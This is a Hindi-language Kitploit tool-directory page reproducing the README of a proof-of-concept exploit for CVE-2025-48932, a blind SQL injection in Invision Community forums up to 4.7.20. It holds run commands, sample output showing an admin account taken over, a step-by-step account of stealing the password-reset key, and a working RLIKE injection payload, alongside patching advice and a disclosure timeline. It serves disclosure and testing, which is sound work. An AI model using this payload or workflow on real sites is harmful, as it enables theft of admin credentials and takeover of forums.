Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-48932---exploit — CVE-2025-48932 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Invision Community <= 4.7.20 में SQL इंजेक्शन। ब्लाइंड SQLi के माध्यम से एडमिन क्रेडेंशियल निकालता है और पासवर्ड रीसेट करता है। केवल अधिकृत परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/xploitgh0st/cve-2025-48932---exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubxploitgh0st/cve-2025-48932---exploit

CVE-2025-48932---exploit

CVE-2025-48932 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Invision Community <= 4.7.20 में SQL इंजेक्शन। ब्लाइंड SQLi के माध्यम से एडमिन क्रेडेंशियल निकालता है और पासवर्ड रीसेट करता है। केवल अधिकृत परीक्षण के लिए।

रिपॉजिटरी देखें
210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Invision Community SQL Injection Exploit (CVE-2025-48932)

Python Version License CVE

यह एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है जो Invision Community संस्करण <= 4.7.20 में SQL इंजेक्शन भेद्यता को प्रदर्शित करता है।

⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है
  • इस टूल का उपयोग केवल उन्हीं सिस्टम पर करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • इस टूल के किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है
  • यह केवल सुरक्षा शोधकर्ताओं, पेनिट्रेशन टेस्टरों और शैक्षिक उद्देश्यों के लिए है

📋 विषय-सूची

  • भेद्यता विवरण
  • आवश्यकताएँ
  • स्थापना
  • उपयोग
  • यह कैसे काम करता है
  • शमन
  • श्रेय
  • संदर्भ

🔍 भेद्यता विवरण

CVE आईडी: CVE-2025-48932
गंभीरता: उच्च
CVSS स्कोर: TBD
प्रभावित संस्करण: 4.7.21 से पहले के Invision Community 4.x संस्करण

यह भेद्यता /applications/calendar/modules/front/calendar/view.php स्क्रिप्ट में मौजूद है। IPS\calendar\modules\front\calendar\view::search() विधि में location अनुरोध पैरामीटर के माध्यम से पारित उपयोगकर्ता इनपुट को SQL क्वेरी में उपयोग करने से पहले ठीक से सैनिटाइज़ नहीं किया जाता है।

यह दूरस्थ, अनधिकृत (unauthenticated) हमलावरों को निम्नलिखित की अनुमति देता है:

  • डेटाबेस से संवेदनशील डेटा निकालना
  • एडमिन क्रेडेंशियल पढ़ना
  • संभावित रूप से एडमिन खाते पर कब्ज़ा करना

शोषण के लिए पूर्वापेक्षाएँ:

  • कैलेंडर एप्लिकेशन स्थापित होना चाहिए
  • जियोलोकेशन सुविधा (जैसे Google Maps) कॉन्फ़िगर होनी चाहिए

नोट: जबकि Invision Community 4.x संस्करण < 4.7.18 में SQL इंजेक्शन भेद्यताएँ एडमिन पासवर्ड रीसेट करके एडमिन खाते पर कब्ज़ा और RCE का कारण बन सकती थीं, संस्करण 4.7.18 ने पासवर्ड रीसेट तंत्र में एक नई सुरक्षा एन्क्रिप्शन कुंजी पेश की, जिससे यह हमला वेक्टर अधिक कठिन हो गया है।

📦 आवश्यकताएँ

  • Python 3.7 या उच्चतर
  • pip (Python पैकेज मैनेजर)
  • इंटरनेट कनेक्शन
  • लक्षित सिस्टम जिस पर Invision Community <= 4.7.20 चल रहा हो, साथ में:
    • कैलेंडर एप्लिकेशन स्थापित
    • जियोलोकेशन सुविधा कॉन्फ़िगर

🚀 स्थापना

  1. रिपॉजिटरी क्लोन करें:

    git clone https://github.com/yourusername/invision-sqli-exploit.git
    cd invision-sqli-exploit
    
  2. निर्भरताएँ स्थापित करें:

    pip install -r requirements.txt
    

💻 उपयोग

बुनियादी उपयोग

python invision-sqli-exploit.py -u http://target.com/forum/

वर्बोज़ मोड (डिबगिंग के लिए)

python invision-sqli-exploit.py -u https://example.com/community/ -v

कमांड-लाइन आर्गुमेंट्स

आर्गुमेंटविवरणआवश्यक
-u, --urlलक्षित Invision Community बेस URLहाँ
-v, --verboseडिबगिंग के लिए वर्बोज़ आउटपुट सक्षम करेंनहीं
-h, --helpसहायता संदेश दिखाएँ और बाहर निकलेंनहीं

उदाहरण आउटपुट

==================================================
Invision Community <= 4.7.20 SQL Injection Exploit
CVE-2025-48932
==================================================
Target: http://example.com/forum/
==================================================

[*] Fetching CSRF token...
[+] CSRF token found: abc123def456...
[*] Step 1: Extracting admin email address...
[*] Extracting data: [email protected]
[+] Admin email: [email protected]

[!] Step 2: Manual action required!

Please follow these steps:
1. Navigate to: http://example.com/forum/index.php?/lostpassword/
2. Request a password reset using email: [email protected]
3. Press ENTER when done...

[*] Step 3: Extracting password reset validation key...
[*] Extracting data: xyz789abc123...
[+] Reset key: xyz789abc123...
[*] Step 4: Resetting admin password...

==================================================
[+] EXPLOITATION SUCCESSFUL!
==================================================

Admin credentials:
  Email:    [email protected]
  Password: Pwned1721234567

You can now login at: http://example.com/forum/index.php?/login/

🔬 यह कैसे काम करता है

यह एक्सप्लॉइट चार मुख्य चरणों में काम करता है:

1. CSRF टोकन निष्कर्षण

स्क्रिप्ट पहले लक्षित वेबसाइट से CSRF टोकन प्राप्त करती है, जो आगामी अनुरोधों के लिए आवश्यक है।

2. बूलियन-आधारित ब्लाइंड SQL इंजेक्शन

बाइनरी सर्च एल्गोरिदम का उपयोग करके, एक्सप्लॉइट डेटाबेस से डेटा को अक्षर-दर-अक्षर निकालता है:

  • कंडीशनल SQL क्वेरी का उपयोग करके प्रत्येक अक्षर का परीक्षण करता है
  • सत्य/असत्य स्थितियों का पता लगाने के लिए regex पैटर्न के साथ RLIKE फ़ंक्शन का उपयोग करता है
  • त्रुटि संदेश सफल स्थितियों का संकेत देते हैं

3. एडमिन ईमेल निष्कर्षण

एडमिन का ईमेल पता निकालने के लिए core_members तालिका में क्वेरी करता है।

4. पासवर्ड रीसेट शोषण

  • हमलावर मैन्युअल रूप से एडमिन खाते के लिए पासवर्ड रीसेट शुरू करता है
  • एक्सप्लॉइट डेटाबेस से पासवर्ड रीसेट वैलिडेशन कुंजी निकालता है
  • ईमेल एक्सेस के बिना एडमिन पासवर्ड रीसेट करने के लिए वैलिडेशन कुंजी का उपयोग करता है

तकनीकी विवरण

इंजेक्शन बिंदु:

location parameter → calendar/view.php → search() method

पेलोड उदाहरण:

'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#

शोषण तकनीक: कुशल डेटा निष्कर्षण के लिए बाइनरी सर्च का उपयोग करने वाला बूलियन-आधारित ब्लाइंड SQL इंजेक्शन।

🛡️ शमन

उपयोगकर्ताओं के लिए

तत्काल कार्रवाइयाँ:

  1. संस्करण 4.7.21 या उसके बाद का अपग्रेड करें - यह संस्करण भेद्यता को पैच करता है
  2. कैलेंडर एप्लिकेशन अक्षम करें यदि उपयोग में नहीं है
  3. संदिग्ध गतिविधि के लिए एक्सेस लॉग की निगरानी करें
  4. अनधिकृत पहुँच के लिए एडमिन खातों की समीक्षा करें

डेवलपर्स के लिए

सुरक्षित कोडिंग प्रथाएँ:

  1. पैरामीटराइज़्ड क्वेरी/प्रीपेयर्ड स्टेटमेंट का उपयोग करें - उपयोगकर्ता इनपुट को SQL क्वेरी में कभी संयोजित न करें
  2. इनपुट सत्यापन - सभी उपयोगकर्ता इनपुट को सत्यापित और सैनिटाइज़ करें
  3. न्यूनतम विशेषाधिकार सिद्धांत - डेटाबेस उपयोगकर्ताओं के पास न्यूनतम आवश्यक अनुमतियाँ होनी चाहिए
  4. वेब एप्लिकेशन फ़ायरवॉल (WAF) - SQL इंजेक्शन प्रयासों का पता लगाने के लिए WAF नियम तैनात करें
  5. नियमित सुरक्षा ऑडिट - समय-समय पर कोड समीक्षा और पेनिट्रेशन परीक्षण करें

सुरक्षित कोड का उदाहरण:

// Vulnerable code
$location = $_REQUEST['location'];
$query = "SELECT * FROM events WHERE location = '$location'";

// Secure code
$location = $_REQUEST['location'];
$query = $db->prepare("SELECT * FROM events WHERE location = ?");
$query->execute([$location]);

📅 प्रकटीकरण समयरेखा

तारीखघटना
May 16, 2025विक्रेता को सूचित किया गया
May 27, 2025संस्करण 4.7.21 जारी किया गया
May 28, 2025CVE पहचानकर्ता का अनुरोध किया गया
May 28, 2025CVE-2025-48932 निर्धारित किया गया
July 23, 2025सार्वजनिक प्रकटीकरण

👏 श्रेय

डेवलपर:

  • nanda

नोट: यह सार्वजनिक रूप से प्रकटित भेद्यता जानकारी (CVE-2025-48932) पर आधारित एक स्वतंत्र कार्यान्वयन है

📚 संदर्भ

  • CVE-2025-48932 विवरण
  • Invision Community आधिकारिक साइट
  • EDB-ID: 52383

📝 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

🤝 योगदान

योगदान का स्वागत है! कृपया बेझिझक पुल रिक्वेस्ट सबमिट करें। बड़े बदलावों के लिए, कृपया पहले एक इश्यू खोलें ताकि आप जो बदलना चाहते हैं उस पर चर्चा की जा सके।

⚖️ कानूनी सूचना

यह टूल MIT लाइसेंस के अंतर्गत वितरित किया जाता है। इस सॉफ़्टवेयर का उपयोग करके, आप निम्नलिखित से सहमत होते हैं:

टूल डाउनलोड करें